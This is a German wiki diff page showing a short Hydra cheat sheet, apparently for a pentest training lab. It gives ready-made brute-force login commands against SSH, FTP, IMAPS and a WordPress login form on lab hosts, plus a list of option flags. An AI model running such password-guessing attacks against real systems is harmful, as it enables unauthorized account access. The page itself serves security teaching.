Hydra: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
(→hydra) |
|||
| Zeile 1: | Zeile 1: | ||
=hydra= | =hydra= | ||
| + | bad-passwords is the file with the passwords | ||
==ssh== | ==ssh== | ||
*hydra -l xinux -P bad-passwords 10.0.10.104 ssh | *hydra -l xinux -P bad-passwords 10.0.10.104 ssh | ||
| Zeile 6: | Zeile 7: | ||
==imaps== | ==imaps== | ||
*hydra -S -v -l xinux -P bad-passwords -s 993 -f 10.0.10.104 imap -V | *hydra -S -v -l xinux -P bad-passwords -s 993 -f 10.0.10.104 imap -V | ||
| + | |||
=Wordpress= | =Wordpress= | ||
* hydra -l admin -P bad-passwords opfer.secure.local -V http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' | * hydra -l admin -P bad-passwords opfer.secure.local -V http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' | ||
Version vom 14. April 2023, 06:07 Uhr
hydra
bad-passwords is the file with the passwords
ssh
- hydra -l xinux -P bad-passwords 10.0.10.104 ssh
ftp
- hydra -l xinux -P bad-passwords 10.0.10.104 ftp
imaps
- hydra -S -v -l xinux -P bad-passwords -s 993 -f 10.0.10.104 imap -V
Wordpress
- hydra -l admin -P bad-passwords opfer.secure.local -V http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
Optionen
- -l -> Specify a username to use during brute force attack
- -L -> Specify a wordlist of usernames to be used during the bruteforce attack
- -p -> Specify a password to use during brute force attack
- -P -> Specify a wordlist of passwords to be used during the bruteforce attack
- -t -> Threads per Scan - Default 16
- -S connect via SSL